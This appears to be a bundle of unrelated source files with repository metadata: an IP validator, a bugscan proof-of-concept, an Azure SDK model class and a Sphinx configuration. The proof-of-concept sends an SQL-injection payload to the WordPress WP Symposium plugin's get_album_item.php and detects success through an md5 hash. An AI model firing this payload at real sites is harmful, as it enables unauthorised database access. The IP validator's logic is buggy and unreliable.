# Ipv4 --> 4 decimal numbers,between 0 to 255 # leading zero's is invalid # check whethere its a digit between 0 to 255 import string def valid(str): address = str.split(".") numbers = range(0,256) for a in address: if len(address) == 4: if int(a) in numbers and a.isdigit() : if len(a) == 2 and a[0] == "0": return "Neither" else: return "IPv4" else: if str[len(str)-1] == ":": return "Neither" else: newAddress = str.split(":") i = 0 while i < len(newAddress)-1: print(newAddress[i]) well = all(c in string.hexdigits for c in newAddress[i]) if well == True: print("well",well) # return "IPv6" else: return "Neither" i +=1 print(valid("1e1.4.5.6"))
[ "mary.jereh@gmail.com" ]
mary.jereh@gmail.com
c574584397da1b7c40f83de3d2d3e61524bd6fe3
427ab1f7f7fe08f76fab6468f6ea24dc5bc2701d
/bugscan/exp-1417.py
512fd0c3befeec133428d005a8e6659d524b5658
[]
no_license
gayhub-blackerie/poc
b852b2bcdba78185efd68817c31579247c6e4b83
8b7c95d765deb450c029a921031eb1c90418f2a7
refs/heads/master
2021-07-24T03:05:52.697820
2017-11-04T10:33:51
2017-11-04T10:33:51
107,093,079
1
0
null
2017-10-16T07:31:31
2017-10-16T07:31:31
null
UTF-8
Python
false
false
636
py
# !/usr/bin/dev python # -*- coding:utf-8 -*- #__Author__ = buliuchang # __refer__ = https://www.exploit-db.com/exploits/37244/ def assign(service, arg): if service == "wordpress": return True, arg def audit(arg): payload='wp-content/plugins/wp-symposium/get_album_item.php?size=md5(1);--' target=arg+payload code, head, res, ecode, redirect_url =curl.curl(target) if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in res: security_hole(target) if __name__ == '__main__': from dummy import * audit(assign('wordpress', 'http://localhost/wordpress/')[1])
[ "hackerlq@gmail.com" ]
hackerlq@gmail.com
c709ea8f114d9d9959cffc3733087f2b1ecde092
a5ba631dddaf2912c309601f8fbdd3c5b494fe20
/src/command_modules/azure-cli-lab/azure/cli/command_modules/lab/sdk/devtestlabs/models/lab_cost.py
166f2a5b9ee62cebfd056824a45a6b13ca19aa6f
[ "MIT" ]
permissive
saurabsa/azure-cli-old
37471020cd2af9a53e949e739643299f71037565
f77477a98c9aa9cb55daf5b0d2f410d1455a9225
refs/heads/master
2023-01-09T04:00:15.642883
2018-04-23T21:40:04
2018-04-23T21:40:04
130,759,501
0
0
NOASSERTION
2022-12-27T14:59:06
2018-04-23T21:33:34
Python
UTF-8
Python
false
false
4,236
py
# coding=utf-8 # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- # coding: utf-8 # pylint: skip-file from msrest.serialization import Model class LabCost(Model): """A cost item. :param target_cost: The target cost properties :type target_cost: :class:`TargetCostProperties <azure.mgmt.devtestlabs.models.TargetCostProperties>` :param lab_cost_summary: The lab cost summary component of the cost data. :type lab_cost_summary: :class:`LabCostSummaryProperties <azure.mgmt.devtestlabs.models.LabCostSummaryProperties>` :param lab_cost_details: The lab cost details component of the cost data. :type lab_cost_details: list of :class:`LabCostDetailsProperties <azure.mgmt.devtestlabs.models.LabCostDetailsProperties>` :param resource_costs: The resource cost component of the cost data. :type resource_costs: list of :class:`LabResourceCostProperties <azure.mgmt.devtestlabs.models.LabResourceCostProperties>` :param currency_code: The currency code of the cost. :type currency_code: str :param start_date_time: The start time of the cost data. :type start_date_time: datetime :param end_date_time: The end time of the cost data. :type end_date_time: datetime :param created_date: The creation date of the cost. :type created_date: datetime :param provisioning_state: The provisioning status of the resource. :type provisioning_state: str :param unique_identifier: The unique immutable identifier of a resource (Guid). :type unique_identifier: str :param id: The identifier of the resource. :type id: str :param name: The name of the resource. :type name: str :param type: The type of the resource. :type type: str :param location: The location of the resource. :type location: str :param tags: The tags of the resource. :type tags: dict """ _attribute_map = { 'target_cost': {'key': 'properties.targetCost', 'type': 'TargetCostProperties'}, 'lab_cost_summary': {'key': 'properties.labCostSummary', 'type': 'LabCostSummaryProperties'}, 'lab_cost_details': {'key': 'properties.labCostDetails', 'type': '[LabCostDetailsProperties]'}, 'resource_costs': {'key': 'properties.resourceCosts', 'type': '[LabResourceCostProperties]'}, 'currency_code': {'key': 'properties.currencyCode', 'type': 'str'}, 'start_date_time': {'key': 'properties.startDateTime', 'type': 'iso-8601'}, 'end_date_time': {'key': 'properties.endDateTime', 'type': 'iso-8601'}, 'created_date': {'key': 'properties.createdDate', 'type': 'iso-8601'}, 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'}, 'unique_identifier': {'key': 'properties.uniqueIdentifier', 'type': 'str'}, 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'location': {'key': 'location', 'type': 'str'}, 'tags': {'key': 'tags', 'type': '{str}'}, } def __init__(self, target_cost=None, lab_cost_summary=None, lab_cost_details=None, resource_costs=None, currency_code=None, start_date_time=None, end_date_time=None, created_date=None, provisioning_state=None, unique_identifier=None, id=None, name=None, type=None, location=None, tags=None): self.target_cost = target_cost self.lab_cost_summary = lab_cost_summary self.lab_cost_details = lab_cost_details self.resource_costs = resource_costs self.currency_code = currency_code self.start_date_time = start_date_time self.end_date_time = end_date_time self.created_date = created_date self.provisioning_state = provisioning_state self.unique_identifier = unique_identifier self.id = id self.name = name self.type = type self.location = location self.tags = tags
[ "saurabsa@microsoft.com" ]
saurabsa@microsoft.com
3fcb753340d6c17fbec10dfc3e30c46fe86be655
60c5716fc0abcb6fcb5d7cf0a06efe0fcb7be56a
/docs/source/conf.py
311b7b47f8220ed602549ee241d3f523f61e9abd
[ "BSD-2-Clause", "Apache-2.0" ]
permissive
cedadev/housemartin
46b5ce3107dab02f1c6b2ccd788570913b59a30e
9d8c75e460a6dc46435760d15dc97ca9141e742f
refs/heads/main
2023-03-26T00:49:49.435008
2021-03-26T14:04:05
2021-03-26T14:04:05
337,997,635
0
0
null
null
null
null
UTF-8
Python
false
false
7,046
py
#!/usr/bin/env python # -*- coding: utf-8 -*- # # housemartin documentation build configuration file, created by # sphinx-quickstart on Fri Jun 9 13:47:02 2017. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. # If extensions (or modules to document with autodoc) are in another # directory, add these directories to sys.path here. If the directory is # relative to the documentation root, use os.path.abspath to make it # absolute, like shown here. # import os import sys # Add housemartin to sys.path to avoid having to full # install housemartin for autodoc. # Full install of housemartin will burst memory limit on ReadTheDocs. sys.path.insert(0, os.path.abspath("../../")) # -- General configuration --------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. # # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = [ "sphinx.ext.autodoc", "sphinx.ext.viewcode", "sphinx.ext.mathjax", "sphinx.ext.napoleon", "sphinx.ext.todo", "pywps.ext_autodoc", "sphinx.ext.autosectionlabel", # "sphinx.ext.imgconverter", # "nbsphinx", # "IPython.sphinxext.ipython_console_highlighting", ] # To avoid having to install these and burst memory limit on ReadTheDocs. # List of all tested working mock imports from all birds so new birds can # inherit without having to test which work which do not. autodoc_mock_imports = [ "numpy", "xarray", "fiona", "rasterio", "shapely", "osgeo", "geopandas", "pandas", "statsmodels", "affine", "rasterstats", "spotpy", "matplotlib", "scipy", "unidecode", "gdal", "sentry_sdk", "dask", "numba", "parse", "siphon", "sklearn", "cftime", "netCDF4", "bottleneck", "ocgis", "geotiff", "geos", "hdf4", "hdf5", "zlib", "pyproj", "proj", "cartopy", "scikit-learn", "cairo", "networkx", "roocs_utils", "daops", ] # Monkeypatch constant because the following are mock imports. # Only works if numpy is actually installed and at the same time being mocked. # import numpy # numpy.pi = 3.1416 # We are using mock imports in readthedocs, so probably safer to not run the notebooks nbsphinx_execute = "never" # Add any paths that contain templates here, relative to this directory. templates_path = ["_templates"] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # # source_suffix = ['.rst', '.md'] source_suffix = ".rst" # The master toctree document. master_doc = "index" # General information about the project. project = "housemartin" copyright = "2020, Carsten Ehbrecht" author = "Carsten Ehbrecht" # The version info for the project you're documenting, acts as replacement # for |version| and |release|, also used in various other places throughout # the built documents. # # The short X.Y version. # version = "0.1.0" # The full version, including alpha/beta/rc tags. "0.2.0" # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This patterns also effect to html_static_path and html_extra_path exclude_patterns = ["_build", "Thumbs.db", ".DS_Store", "**.ipynb_checkpoints"] # The name of the Pygments (syntax highlighting) style to use. pygments_style = "sphinx" # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = False # Suppress "WARNING: unknown mimetype for ..." when building EPUB. suppress_warnings = ["epub.unknown_project_files"] # Avoid "configuration.rst:4:duplicate label configuration, other instance in configuration.rst" autosectionlabel_prefix_document = True # -- Options for HTML output ------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = "alabaster" # Theme options are theme-specific and customize the look and feel of a # theme further. For a list of options available for each theme, see the # documentation. # # html_theme_options = {} # The name of an image file (relative to this directory) to place at the top # of the sidebar. html_logo = "_static/birdhouse_logo.svg" # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. html_favicon = "_static/favicon.ico" # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ["_static"] # -- Options for HTMLHelp output --------------------------------------- # Output file base name for HTML help builder. htmlhelp_basename = "housemartindoc" # -- Options for LaTeX output ------------------------------------------ latex_elements = { # The paper size ('letterpaper' or 'a4paper'). # # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). # # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. # # 'preamble': '', # Latex figure (float) alignment # # 'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, documentclass # [howto, manual, or own class]). latex_documents = [ ( master_doc, "housemartin.tex", "housemartin Documentation", "Carsten Ehbrecht", "manual", ), ] # -- Options for manual page output ------------------------------------ # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ ( master_doc, "housemartin", "housemartin Documentation", [author], 1, ) ] # -- Options for Texinfo output ---------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ ( master_doc, "housemartin", "housemartin Documentation", author, "housemartin", "A WPS service for roocs.", "Miscellaneous", ), ]
[ "ag.stephens@stfc.ac.uk" ]
ag.stephens@stfc.ac.uk